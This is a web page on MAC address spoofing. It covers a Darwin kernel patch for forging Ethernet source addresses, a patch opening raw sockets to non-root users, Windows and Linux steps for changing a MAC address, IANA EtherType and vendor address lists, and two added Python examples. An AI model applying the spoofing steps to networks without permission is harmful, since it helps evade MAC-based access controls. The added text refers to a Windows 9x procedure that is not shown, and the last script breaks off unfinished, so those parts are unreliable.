An essential component of penetration testing and network wargames is the ability to specify arbitrary MAC addresses. This ability is also required for the implementation of certain kinds of protective security functionality such as proxy ARP, in conjunction with tools such as arpcatch. It's my understanding that ARP spoofing is even being used in some experimental intrusion detection technologies.
Note that this patch is not a tool in and of itself; it merely extends other tools and APIs.

Like other BSD-derived codebases, Mac OS X and Darwin kernels like to meticulously stick the hardware address into the source field of each ethernet header. The following Darwin / Mac OS X kernel patch removes that tendency for AF_UNSPEC packets, allowing injected packets to forge that field in the header.

Also supplied below are a RAW4ALL patch, so you don't always have to be root to use raw sockets, and a FORCE_VERBOSE patch to force verbose output at boot time without having to press Option-V. Note that the FORCE_VERBOSE patch is not necessary with some Apple-supplied tarballs and CVS checkouts.

In recent days, Jeff Nathan has put together a less kludgey patch that fixes all the known issues; this is linked to below. These patches have been tested and verified with up to OS X 10.3 (Darwin 7.0) and verified to allow MAC spoofing with ethernet cards as well as wireless cards.




--------------------------------------------------------------------------------

installation


Building a Darwin kernel is a little different than building one in Open, Free, or NetBSD, so I've included brief directions. If you're a seasoned Darwin user or developer, you likely have all the tools ready to go to build xnu, the source tree for the Darwin kernel. If so, skip ahead to step 5. However, if you've just installed Mac OS X, you likely don't have everything you need to compile kernels, and there are a few steps to go through:
Grab and install the developer tools from Apple's developer site if you haven't already.
make and make install relpath from the bootstrap_cmds project.
make and make install the Libstreams project.
Unpack the cctools project,
  make all in the libstuff directory,
  make macos_all in the misc directory and install seg_hack.NEW as /usr/local/bin/seg_hack,
  make macos in the libmacho directory and install otmp_obj/libmacho_static.a in /usr/local/lib, and
  make kld_build in the ld directory and install static_kld/libkld.a in /usr/local/lib.
[Mac OS X 10.3 / Darwin 7.0 only] Build kextsymboltool from the kext_tools project and install in /usr/local/bin. You will need to pull in headers from the IOKitUser project and cctools.
Build the xnu project with the patches of your choice below, the proper options in bsd/conf/MASTER, and the directions in the README supplied by Apple in the xnu tarball. Install your new kernel at /mach_kernel. It goes without saying that you should back up your old one first.
Reboot your box.
I've encountered or heard about a variety of very different compile-time problems, depending on the version of the operating system and the developer tools you're using; if this is the case, try fiddling around with gcc_select.
The directions above, by the way, are intentionally not very thorough. I've tried to write these directions for those who will be able to make use of this patch. In other words, if you can't navigate through the directions above, you probably shouldn't be messing with this patch. Either way, please use it responsibly.

known issues


Jeff Nathan's patch should fix all the known issues with the original ETHERSPOOF patch. Do not use his patch with any of the ETHERSPOOF patches above. They are incompatible, and his patch is better.
The older ETHERSPOOF patches above break the DHCP client thanks to the funky DLILization of the kernel, and though I have yet to see them cause problems getting an address personally, I have received reports and seen the cause of the problem, empty source ethernet address fields in the header.



To Change MAC address on Windows 2000, XP and 2003 :-

This depends on the type of Network Interface Card (NIC) you have. If your card does not support setting a cloned MAC address, you have to use the second method.

Go to Start->Settings->Control Panel and double-click on Network and Dial-up Connections.

Right-click on the NIC whose MAC address you want to change and click on Properties.

Under the General tab, click on the Configure button.

Click on the Advanced tab.

Under the Property section, you should see an item called Network Address or "Locally Administered Address"; click on it.

On the right side, under Value, type in the new MAC address you want to assign to your NIC. Usually this value is entered without the "-" separators between the octets.

Go to a command prompt and type "ipconfig /all" or "net config rdr" to verify the change. If the change has not taken effect, use the second method.

If successful, reboot your system.

MAC addresses on 2000, XP and 2003 can also be changed with a tool named SMAC.



To Change MAC on Windows NT :-

Go to Start->Run and type "cmd" to open a command prompt.

Type "ipconfig /all" and record the MAC address of each network adapter.

Go to Start->Run and type "regedit" to bring up the Registry Editor. Make sure you back up your registry first in case you make a mistake: if you damage important registry entries, you may damage your system. Again, MAKE SURE you have a good backup of your registry!

Locate "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\\Parameters". It should have subkeys like "xyz0000", "xyz0001", "xyz0002" and so on.

Click on each subkey, starting with "0000", and identify your Ethernet card by looking at the "DriverDesc" value. If it does not match, go on to "0001", "0002" and so on.

Once you have found the right NIC:

Click on the Edit->New->String Value menu item.

Name the new string "NetworkAddress" and click OK.

Double-click the new "NetworkAddress" string and you will be prompted for "Value data".

Enter the new MAC address you want to assign. It should be 12 hexadecimal digits with NO "-" separators, e.g. "00C095ECB761".

Reboot your system.

Verify the new MAC address with "ipconfig".
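Both registry procedures above (the Windows 9x "networkaddress" string under Class\Net and the Windows NT "NetworkAddress" string under the adapter's Parameters key) leave a visible trace, so those same values are what a defender audits when a MAC-based control stops matching. The script below is an added example, not code from the original post: it parses a constructed regedit export, lists every adapter key under CurrentControlSet\Services that carries an override, and checks each value against the 12-hex-digit, even-second-digit format the steps call for.

```python
"""Audit a regedit export for NIC MAC address overrides.

Added example, not part of the original post. The Win9x and NT steps store
the override as a networkaddress / NetworkAddress string under the adapter
key beneath CurrentControlSet Services, so that is where a defender looks
for a changed MAC. The export text is constructed, not from a real host.
"""
import re

# Constructed sample of a regedit export: one clean 9x adapter, one 9x
# adapter with an override, and one NT-style Parameters key with a
# mis-formatted override (separators are not accepted by the driver).
SAMPLE_REG_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net\0000]
"DriverDesc"="Realtek RTL8139 Fast Ethernet Adapter"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net\0001]
"DriverDesc"="3Com EtherLink XL PCI"
"networkaddress"="00C095ECB761"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\E100B1\Parameters]
"NetworkAddress"="11-22-AB-C5-9E-6D"
"""

SERVICES_KEY = "\\currentcontrolset\\services\\"
SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"\s*$')


def parse_reg_export(text):
    """Return {key_path: {value_name_lower: value}} for the string values."""
    keys = {}
    current = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # Registry value names are case-insensitive (networkaddress vs
            # NetworkAddress), so normalise them for lookup.
            keys[current][m.group(1).lower()] = m.group(2)
    return keys


def check_override_value(value):
    """Classify an override value against the format the steps require.

    "ok"          12 hex digits, even second digit (a unicast station address)
    "bad-format"  separators or wrong length; the driver will not apply it
    "multicast"   odd second hex digit: multicast bit set, not a station address
    """
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", value):
        return "bad-format"
    if int(value[1], 16) & 1:
        return "multicast"
    return "ok"


def find_mac_overrides(text):
    """Return (adapter label, override value, status) for every adapter key
    under CurrentControlSet Services that carries a NetworkAddress value."""
    findings = []
    for path, values in parse_reg_export(text).items():
        low = path.lower()
        if SERVICES_KEY not in low or "networkaddress" not in values:
            continue
        # Win9x keys carry DriverDesc; NT keys are named after the adapter,
        # so fall back to the key path below Services.
        label = values.get("driverdesc") or path[low.index(SERVICES_KEY) + len(SERVICES_KEY):]
        mac = values["networkaddress"]
        findings.append((label, mac, check_override_value(mac)))
    return findings


if __name__ == "__main__":
    for label, mac, status in find_mac_overrides(SAMPLE_REG_EXPORT):
        print(f"{label}: NetworkAddress={mac} [{status}]")
```

On a real host, export the Services key with regedit and feed the .reg file to find_mac_overrides; any adapter reported with an override that you did not configure yourself is worth a closer look.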

MAC addresses on Unix and Linux can be changed easily with a tool named macchanger, from :- http://www.alobbs.com/modules.php?op=modload&name=macc&file=index


On Linux machines, to change the MAC address type this :-

ifdown eth0 (where eth0 is the Ethernet interface)

ifconfig eth0 hw ether 11:22:AB:C5:9E:6D (<== this is the new MAC address; the interface name must be given before "hw ether")

ifup eth0

Now run ifconfig -a to confirm the MAC address has changed :)

Ok now here is the List of Codes of Vendor Addresses and Vendor Multicast Addresses :-

Here are the MultiCast Address Vendor Codes :-
ETHER TYPES

(last updated 2001-05-01)

Many of the networks of all classes are Ethernets (10Mb) or
Experimental Ethernets (3Mb). These systems use a message "type"
field in much the same way the ARPANET uses the "link" field.

If you need an Ether Type, contact:

IEEE Registration Authority
c/o Iris Ringel
IEEE Standards Department
445 Hoes Lane, P.O. Box 1331
Piscataway, NJ 08855-1331
Phone +1 732 562 3813
Fax: +1 732 562 1571
Email:
http://standards.ieee.org/db/oui/forms/


The following list of EtherTypes is contributed unverified information
from various sources. Another list of EtherTypes is maintained by
Michael A. Patton and is accessible at:





Assignments:

Ethernet Exp. Ethernet Description References
------------- ------------- ----------- ----------
decimal Hex decimal octal
0000 0000-05DC - - IEEE802.3 Length Field [XEROX]
0257 0101-01FF - - Experimental [XEROX]
0512 0200 512 1000 XEROX PUP (see 0A00) [8,XEROX]
0513 0201 - - PUP Addr Trans (see 0A01)[XEROX]
0400 Nixdorf [XEROX]
1536 0600 1536 3000 XEROX NS IDP [133,XEROX]
0660 DLOG [XEROX]
0661 DLOG [XEROX]
2048 0800 513 1001 Internet IP (IPv4) [IANA]
2049 0801 - - X.75 Internet [XEROX]
2050 0802 - - NBS Internet [XEROX]
2051 0803 - - ECMA Internet [XEROX]
2052 0804 - - Chaosnet [XEROX]
2053 0805 - - X.25 Level 3 [XEROX]
2054 0806 - - ARP [IANA]
2055 0807 - - XNS Compatibility [XEROX]
2056 0808 - - Frame Relay ARP [RFC1701]
2076 081C - - Symbolics Private [DCP1]
2184 0888-088A - - Xyplex [XEROX]
2304 0900 - - Ungermann-Bass net debugr[XEROX]
2560 0A00 - - Xerox IEEE802.3 PUP [XEROX]
2561 0A01 - - PUP Addr Trans [XEROX]
2989 0BAD - - Banyan VINES [XEROX]
2990 0BAE - - VINES Loopback [RFC1701]
2991 0BAF - - VINES Echo [RFC1701]
4096 1000 - - Berkeley Trailer nego [XEROX]
4097 1001-100F - - Berkeley Trailer encap/IP[XEROX]
5632 1600 - - Valid Systems [XEROX]
16962 4242 - - PCS Basic Block Protocol [XEROX]
21000 5208 - - BBN Simnet [XEROX]
24576 6000 - - DEC Unassigned (Exp.) [XEROX]
24577 6001 - - DEC MOP Dump/Load [XEROX]
24578 6002 - - DEC MOP Remote Console [XEROX]
24579 6003 - - DEC DECNET Phase IV Route[XEROX]
24580 6004 - - DEC LAT [XEROX]
24581 6005 - - DEC Diagnostic Protocol [XEROX]
24582 6006 - - DEC Customer Protocol [XEROX]
24583 6007 - - DEC LAVC, SCA [XEROX]
24584 6008-6009 - - DEC Unassigned [XEROX]
24586 6010-6014 - - 3Com Corporation [XEROX]
25944 6558 - - Trans Ether Bridging [RFC1701]
25945 6559 - - Raw Frame Relay [RFC1701]
28672 7000 - - Ungermann-Bass download [XEROX]
28674 7002 - - Ungermann-Bass dia/loop [XEROX]
28704 7020-7029 - - LRT [XEROX]
28720 7030 - - Proteon [XEROX]
28724 7034 - - Cabletron [XEROX]
32771 8003 - - Cronus VLN [131,DT15]
32772 8004 - - Cronus Direct [131,DT15]
32773 8005 - - HP Probe [XEROX]
32774 8006 - - Nestar [XEROX]
32776 8008 - - AT&T [XEROX]
32784 8010 - - Excelan [XEROX]
32787 8013 - - SGI diagnostics [AXC]
32788 8014 - - SGI network games [AXC]
32789 8015 - - SGI reserved [AXC]
32790 8016 - - SGI bounce server [AXC]
32793 8019 - - Apollo Domain [XEROX]
32815 802E - - Tymshare [XEROX]
32816 802F - - Tigan, Inc. [XEROX]
32821 8035 - - Reverse ARP [48,JXM]
32822 8036 - - Aeonic Systems [XEROX]
32824 8038 - - DEC LANBridge [XEROX]
32825 8039-803C - - DEC Unassigned [XEROX]
32829 803D - - DEC Ethernet Encryption [XEROX]
32830 803E - - DEC Unassigned [XEROX]
32831 803F - - DEC LAN Traffic Monitor [XEROX]
32832 8040-8042 - - DEC Unassigned [XEROX]
32836 8044 - - Planning Research Corp. [XEROX]
32838 8046 - - AT&T [XEROX]
32839 8047 - - AT&T [XEROX]
32841 8049 - - ExperData [XEROX]
32859 805B - - Stanford V Kernel exp. [XEROX]
32860 805C - - Stanford V Kernel prod. [XEROX]
32861 805D - - Evans & Sutherland [XEROX]
32864 8060 - - Little Machines [XEROX]
32866 8062 - - Counterpoint Computers [XEROX]
32869 8065 - - Univ. of Mass. @ Amherst [XEROX]
32870 8066 - - Univ. of Mass. @ Amherst [XEROX]
32871 8067 - - Veeco Integrated Auto. [XEROX]
32872 8068 - - General Dynamics [XEROX]
32873 8069 - - AT&T [XEROX]
32874 806A - - Autophon [XEROX]
32876 806C - - ComDesign [XEROX]
32877 806D - - Computgraphic Corp. [XEROX]
32878 806E-8077 - - Landmark Graphics Corp. [XEROX]
32890 807A - - Matra [XEROX]
32891 807B - - Dansk Data Elektronik [XEROX]
32892 807C - - Merit Internodal [HWB]
32893 807D-807F - - Vitalink Communications [XEROX]
32896 8080 - - Vitalink TransLAN III [XEROX]
32897 8081-8083 - - Counterpoint Computers [XEROX]
32923 809B - - Appletalk [XEROX]
32924 809C-809E - - Datability [XEROX]
32927 809F - - Spider Systems Ltd. [XEROX]
32931 80A3 - - Nixdorf Computers [XEROX]
32932 80A4-80B3 - - Siemens Gammasonics Inc. [XEROX]
32960 80C0-80C3 - - DCA Data Exchange Cluster[XEROX]
32964 80C4 - - Banyan Systems [XEROX]
32965 80C5 - - Banyan Systems [XEROX]
32966 80C6 - - Pacer Software [XEROX]
32967 80C7 - - Applitek Corporation [XEROX]
32968 80C8-80CC - - Intergraph Corporation [XEROX]
32973 80CD-80CE - - Harris Corporation [XEROX]
32975 80CF-80D2 - - Taylor Instrument [XEROX]
32979 80D3-80D4 - - Rosemount Corporation [XEROX]
32981 80D5 - - IBM SNA Service on Ether [XEROX]
32989 80DD - - Varian Associates [XEROX]
32990 80DE-80DF - - Integrated Solutions TRFS[XEROX]
32992 80E0-80E3 - - Allen-Bradley [XEROX]
32996 80E4-80F0 - - Datability [XEROX]
33010 80F2 - - Retix [XEROX]
33011 80F3 - - AppleTalk AARP (Kinetics)[XEROX]
33012 80F4-80F5 - - Kinetics [XEROX]
33015 80F7 - - Apollo Computer [XEROX]
33023 80FF-8103 - - Wellfleet Communications [XEROX]
33031 8107-8109 - - Symbolics Private [XEROX]
33072 8130 - - Hayes Microcomputers [XEROX]
33073 8131 - - VG Laboratory Systems [XEROX]
33074 8132-8136 Bridge Communications [XEROX]
33079 8137-8138 - - Novell, Inc. [XEROX]
33081 8139-813D - - KTI [XEROX]
8148 Logicraft [XEROX]
8149 Network Computing Devices[XEROX]
814A Alpha Micro [XEROX]
33100 814C - - SNMP [JKR1]
814D BIIN [XEROX]
814E BIIN [XEROX]
814F Technically Elite Concept[XEROX]
8150 Rational Corp [XEROX]
8151-8153 Qualcomm [XEROX]
815C-815E Computer Protocol Pty Ltd[XEROX]
8164-8166 Charles River Data System[XEROX]
817D XTP [XEROX]
817E SGI/Time Warner prop. [XEROX]
8180 HIPPI-FP encapsulation [XEROX]
8181 STP, HIPPI-ST [XEROX]
8182 Reserved for HIPPI-6400 [XEROX]
8183 Reserved for HIPPI-6400 [XEROX]
8184-818C Silicon Graphics prop. [XEROX]
818D Motorola Computer [XEROX]
819A-81A3 Qualcomm [XEROX]
81A4 ARAI Bunkichi [XEROX]
81A5-81AE RAD Network Devices [XEROX]
81B7-81B9 Xyplex [XEROX]
81CC-81D5 Apricot Computers [XEROX]
81D6-81DD Artisoft [XEROX]
81E6-81EF Polygon [XEROX]
81F0-81F2 Comsat Labs [XEROX]
81F3-81F5 SAIC [XEROX]
81F6-81F8 VG Analytical [XEROX]
8203-8205 Quantum Software [XEROX]
8221-8222 Ascom Banking Systems [XEROX]
823E-8240 Advanced Encryption Syste[XEROX]
827F-8282 Athena Programming [XEROX]
8263-826A Charles River Data System[XEROX]
829A-829B Inst Ind Info Tech [XEROX]
829C-82AB Taurus Controls [XEROX]
82AC-8693 Walker Richer & Quinn [XEROX]
8694-869D Idea Courier [XEROX]
869E-86A1 Computer Network Tech [XEROX]
86A3-86AC Gateway Communications [XEROX]
86DB SECTRA [XEROX]
86DE Delta Controls [XEROX]
86DD IPv6 [IANA]
34543 86DF - - ATOMIC [Postel]
86E0-86EF Landis & Gyr Powers [XEROX]
8700-8710 Motorola [XEROX]
34667 876B - - TCP/IP Compression [RFC1144]
34668 876C - - IP Autonomous Systems [RFC1701]
34669 876D - - Secure Data [RFC1701]
880B PPP [IANA]
8847 MPLS Unicast [Rosen]
8848 MPLS Multicast [Rosen]
8A96-8A97 Invisible Software [XEROX]
36864 9000 - - Loopback [XEROX]
36865 9001 - - 3Com(Bridge) XNS Sys Mgmt[XEROX]
36866 9002 - - 3Com(Bridge) TCP-IP Sys [XEROX]
36867 9003 - - 3Com(Bridge) loop detect [XEROX]
65280 FF00 - - BBN VITAL-LanBridge cache[XEROX]
FF00-FF0F ISC Bunker Ramo [XEROX]
65535 FFFF - - Reserved [RFC1701]

The standard for transmission of IP datagrams over Ethernets and
Experimental Ethernets is specified in [RFC894] and [RFC895]
respectively.

NOTE: Ethernet 48-bit address blocks are assigned by the IEEE.



ETHERNET VENDOR ADDRESS COMPONENTS or ORGANIZATIONALLY UNIQUE IDENTIFIERS

Ethernet hardware addresses are 48 bits, expressed as 12 hexadecimal
digits (0-9, plus A-F, capitalized). These 12 hex digits consist of
the first/left 6 digits (which should match the vendor of the Ethernet
interface within the station) and the last/right 6 digits which
specify the interface serial number for that interface vendor.

These high-order 3 octets (6 hex digits) are also known as the
Organizationally Unique Identifier or OUI.

Ethernet addresses might be written unhyphenated (e.g., 123456789ABC),
or with one hyphen (e.g., 123456-789ABC), but should be written
hyphenated by octets (e.g., 12-34-56-78-9A-BC).

These addresses are physical station addresses, not multicast nor
broadcast, so the second hex digit (reading from the left) will be
even, not odd.

At present, it is not clear how the IEEE assigns Ethernet block
addresses. Whether in blocks of 2**24 or 2**25, and whether
multicasts are assigned with that block or separately. A portion of
the vendor block address is reportedly assigned serially, with the
other portion intentionally assigned randomly. If there is a global
algorithm for which addresses are designated to be physical (in a
chipset) versus logical (assigned in software), or globally-assigned
versus locally-assigned addresses, some of the known addresses do not
follow the scheme (e.g., AA0003; 02xxxx).

Another list of Ethernet vendor address components is maintained by
Michael A. Patton and is accessible at:





00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Sytek
00001D Cabletron
000020 DIAB (Data Industrier AB)
000022 Visual Technology
00002A TRW
000032 GPT Limited (reassigned from GEC Computers Ltd)
00005A S & Koch
00005E IANA
000065 Network General
00006B MIPS
000077 Interphase Corporation
00007A Ardent
000080 Cray Communications A/S
000089 Cayman Systems Gatorbox
000093 Proteon
00009F Ameristar Technology
0000A2 Wellfleet
0000A3 Network Application Technology
0000A6 Network General (internal assignment, not for products)
0000A7 NCD X-terminals
0000A9 Network Systems
0000AA Xerox Xerox machines
0000B3 CIMLinc
0000B7 Dove Fastnet
0000BC Allen-Bradley
0000C0 Western Digital
0000C5 Farallon phone net card
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers
0000D0 Develcon
0000D7 Dartmouth College (NED Router)
0000D8 3Com? Novell? PS/2
0000DD Gould
0000DE Unigraph
0000E2 Acer Counterpoint
0000EF Alantec
0000FD High Level Hardware (Orion, UK)
000102 BBN BBN internal usage (not registered)
0010D1 BlazeNet
001700 Kabel
0020AF 3COM ???
0020C9 Victron
002094 Cubix
008064 Wyse Technology / Link Technologies
00802B IMAC ???
00802D Xylogics, Inc. Annex terminal servers
00808C Frontier Software Development
0080C2 IEEE 802.1 Committee
0080D3 Shiva
00A03E ATM Forum
00AA00 Intel
00DD00 Ungermann-Bass
00DD01 Ungermann-Bass
020701 Racal InterLan
020406 BBN BBN internal usage (not registered)
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
080002 3Com (Formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080008 BBN
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 NSC
08001A Data General
08001B Data General
08001E Apollo
080020 Sun Sun machines
080022 NBI
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080036 Intergraph CAE stations
080037 Fuji-Xerox
080038 Bull
080039 Spider Systems
080041 DCA Digital Comm. Assoc.
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080049 Univation
08004C Encore
08004E BICC
080056 Stanford University
080058 ??? DECsystem-20
08005A IBM
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
08006E Concurrent Masscomp
080075 DDE (Danish Data Elektronik A/S)
08007C Vitalink TransLAN III
080080 XIOS
080086 Imagen/QMS
080087 Xyplex terminal servers
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
080090 Retix Inc Bridges
484453 HDS ???
800010 AT&T
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for systems running
DECNET
The CFxxxx Series

RFC 2153 describes a method of using a "pseudo OUI" for certain
purposes when there is no appropriate regular OUI assigned. These are
listed here.

CF0001 Data Comm for Business [McCain]

ETHERNET MULTICAST ADDRESSES

An Ethernet multicast address consists of the multicast bit, the
23-bit vendor component, and the 24-bit group identifier assigned by
the vendor. For example, DEC is assigned the vendor component
08-00-2B, so multicast addresses assigned by DEC have the first
24-bits 09-00-2B (since the multicast bit is the low-order bit of the
first byte, which is "the first bit on the wire").

Another list of Ethernet multicast addresses is maintained by Michael
A. Patton and is accessible at:





Ethernet Type
Address Field Usage

Multicast Addresses:

01-00-5E-00-00-00- 0800 Internet Multicast [RFC1112]
01-00-5E-7F-FF-FF
01-00-5E-80-00-00- ???? Internet reserved by IANA
01-00-5E-FF-FF-FF
01-80-C2-00-00-00 -802- Spanning tree (for bridges)
09-00-02-04-00-01? 8080? Vitalink printer
09-00-02-04-00-02? 8080? Vitalink management
09-00-09-00-00-01 8005 HP Probe
09-00-09-00-00-01 -802- HP Probe
09-00-09-00-00-04 8005? HP DTC
09-00-1E-00-00-00 8019? Apollo DOMAIN
09-00-2B-00-00-00 6009? DEC MUMPS?
09-00-2B-00-00-01 8039? DEC DSM/DTP?
09-00-2B-00-00-02 803B? DEC VAXELN?
09-00-2B-00-00-03 8038 DEC Lanbridge Traffic Monitor (LTM)
09-00-2B-00-00-04 ???? DEC MAP End System Hello
09-00-2B-00-00-05 ???? DEC MAP Intermediate System Hello
09-00-2B-00-00-06 803D? DEC CSMA/CD Encryption?
09-00-2B-00-00-07 8040? DEC NetBios Emulator?
09-00-2B-00-00-0F 6004 DEC Local Area Transport (LAT)
09-00-2B-00-00-1x ???? DEC Experimental
09-00-2B-01-00-00 8038 DEC LanBridge Copy packets
(All bridges)
09-00-2B-01-00-01 8038 DEC LanBridge Hello packets
(All local bridges)
1 packet per second, sent by the
designated LanBridge
09-00-2B-02-00-00 ???? DEC DNA Lev. 2 Routing Layer routers?
09-00-2B-02-01-00 803C? DEC DNA Naming Service Advertisement?
09-00-2B-02-01-01 803C? DEC DNA Naming Service Solicitation?
09-00-2B-02-01-02 803E? DEC DNA Time Service?
09-00-2B-03-xx-xx ???? DEC default filtering by bridges?
09-00-2B-04-00-00 8041? DEC Local Area Sys. Transport (LAST)?
09-00-2B-23-00-00 803A? DEC Argonaut Console?
09-00-4E-00-00-02? 8137? Novell IPX
09-00-56-00-00-00- ???? Stanford reserved
09-00-56-FE-FF-FF
09-00-56-FF-00-00- 805C Stanford V Kernel, version 6.0
09-00-56-FF-FF-FF
09-00-77-00-00-01 ???? Retix spanning tree bridges
09-00-7C-02-00-05 8080? Vitalink diagnostics
09-00-7C-05-00-01 8080? Vitalink gateway?
0D-1E-15-BA-DD-06 ???? HP
AB-00-00-01-00-00 6001 DEC Maintenance Operation Protocol
(MOP) Dump/Load Assistance
AB-00-00-02-00-00 6002 DEC Maintenance Operation Protocol
(MOP) Remote Console
1 System ID packet every 8-10 minutes,
by every:
DEC LanBridge
DEC DEUNA interface
DEC DELUA interface
DEC DEQNA interface
(in a certain mode)
AB-00-00-03-00-00 6003 DECNET Phase IV end node Hello
packets 1 packet every 15 seconds,
sent by each DECNET host
AB-00-00-04-00-00 6003 DECNET Phase IV Router Hello packets
1 packet every 15 seconds, sent by
the DECNET router
AB-00-00-05-00-00 ???? Reserved DEC through
AB-00-03-FF-FF-FF
AB-00-03-00-00-00 6004 DEC Local Area Transport (LAT) - old
AB-00-04-00-xx-xx ???? Reserved DEC customer private use
AB-00-04-01-xx-yy 6007 DEC Local Area VAX Cluster groups
Sys. Communication Architecture (SCA)
CF-00-00-00-00-00 9000 Ethernet Configuration Test protocol
(Loopback)

Broadcast Address:

FF-FF-FF-FF-FF-FF 0600 XNS packets, Hello or gateway search?
6 packets every 15 seconds, per XNS
station
FF-FF-FF-FF-FF-FF 0800 IP (e.g. RWHOD via UDP) as needed
FF-FF-FF-FF-FF-FF 0804 CHAOS
FF-FF-FF-FF-FF-FF 0806 ARP (for IP and CHAOS) as needed
FF-FF-FF-FF-FF-FF 0BAD Banyan
FF-FF-FF-FF-FF-FF 1600 VALID packets, Hello or gateway
search?
1 packets every 30 seconds, per VALID
station
FF-FF-FF-FF-FF-FF 8035 Reverse ARP
FF-FF-FF-FF-FF-FF 807C Merit Internodal (INP)
FF-FF-FF-FF-FF-FF 809B EtherTalk



IANA ETHERNET ADDRESS BLOCK - UNICAST USE

The IANA owns an Ethernet address block which may be used for
unicast address assignments or other special purposes.

The IANA may assign unicast global IEEE 802 MAC addresses from its
assigned OUI (00-00-5E) for use in IETF standards track protocols. The
intended usage is for dynamic mapping between IP addresses and IEEE
802 MAC addresses. These IEEE 802 MAC addresses are not to be
permanently assigned to any hardware interface, nor is this a
substitute for a network equipment supplier getting its own OUI.

The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010

In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.

IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E

IEEE Token Ring bit transmission order: 00 00 7A

Appearance on the wire (bits transmitted from left to right):

0                           23                            47
|                           |                             |
0000 0000 0000 0000 0111 1010 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit

Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):

0                           23                            47
|                           |                             |
0000 0000 0000 0000 0101 1110 xxxx xxxx xxxx xxxx xxxx xxxx
|
Multicast Bit

The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Unicast addresses is:

00-00-5E-00-00-00 to 00-00-5E-FF-FF-FF in hex, or

0.0.94.0.0.0 to 0.0.94.255.255.255 in dotted decimal

The low order 24 bits of these unicast addresses are assigned as
follows:

Dotted Decimal Description Reference
----------------------- ------------------------------- ---------
000.000.000-000.000.255 Reserved [IANA]
000.001.000-000.001.255 Virtual Router Redundancy (VRRP) [Hinden]



IANA ETHERNET ADDRESS BLOCK - MULTICAST USE

The IANA owns an Ethernet address block which may be used for
multicast address assignments or other special purposes.

The address block in IEEE binary is: 0000 0000 0000 0000 0111 1010

In the normal Internet dotted decimal notation this is 0.0.94 since
the bytes are transmitted higher order first and bits within bytes are
transmitted lower order first.

IEEE CSMA/CD and Token Bus bit transmission order: 00 00 5E

IEEE Token Ring bit transmission order: 00 00 7A

Appearance on the wire (bits transmitted from left to right):

0                           23                            47
|                           |                             |
1000 0000 0000 0000 0111 1010 xxxx xxx0 xxxx xxxx xxxx xxxx
|                                     |
Multicast Bit                         0 = Internet Multicast
                                      1 = Assigned by IANA for
                                          other uses

Appearance in memory (bits transmitted right-to-left within octets,
octets transmitted left-to-right):

0                           23                            47
|                           |                             |
0000 0001 0000 0000 0101 1110 0xxx xxxx xxxx xxxx xxxx xxxx
|                             |
Multicast Bit                 0 = Internet Multicast
                              1 = Assigned by IANA for other uses

The latter representation corresponds to the Internet standard
bit-order, and is the format that most programmers have to deal with.
Using this representation, the range of Internet Multicast addresses
is:

01-00-5E-00-00-00 to 01-00-5E-7F-FF-FF in hex, or

1.0.94.0.0.0 to 1.0.94.127.255.255 in dotted decimal
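The vendor address components, multicast addresses and IANA block passages above all describe the same 48 bits from different angles: the OUI in the high-order three octets, the multicast bit as the low-order bit of the first octet, the locally administered "02xxxx" style, and the bit-reversed 00-00-7A Token Ring view of 00-00-5E. The decoder below is an added example, not code from the original post or from the IANA document; its OUI table is a five-entry subset of the vendor list on this page, and every address in the usage call is either a value from this page or, for 11:22:AB:C5:9E:6D, the Linux example above.

```python
"""Decode a 48-bit Ethernet address the way the IANA text above describes it.

Added example, not part of the original post. OUI_TABLE is a small subset
of the vendor address components listed on this page.
"""
import re

# Subset of the vendor address components listed above (OUI -> vendor).
OUI_TABLE = {
    "00000C": "Cisco",
    "00005E": "IANA",
    "08002B": "DEC",
    "080020": "Sun",
    "AA0004": "DEC (local logical address, DECNET)",
}


def parse_mac(text):
    """Accept 123456789ABC, 123456-789ABC, 12-34-56-78-9A-BC or
    12:34:56:78:9A:BC and return the six octets as ints."""
    digits = re.sub(r"[-:.]", "", text).upper()
    if not re.fullmatch(r"[0-9A-F]{12}", digits):
        raise ValueError(f"not a 48-bit Ethernet address: {text!r}")
    return [int(digits[i:i + 2], 16) for i in range(0, 12, 2)]


def fmt_hyphenated(octets):
    """The form recommended above: hyphenated by octets, capitalised hex."""
    return "-".join(f"{o:02X}" for o in octets)


def fmt_dotted_decimal(octets):
    return ".".join(str(o) for o in octets)


def reverse_bits(octet):
    """Reverse the eight bits of one octet: the Token Ring / on-the-wire view,
    where the first bit transmitted is the low-order bit in memory."""
    return int(f"{octet:08b}"[::-1], 2)


def describe(text):
    """Return the properties the IANA text spells out for one address."""
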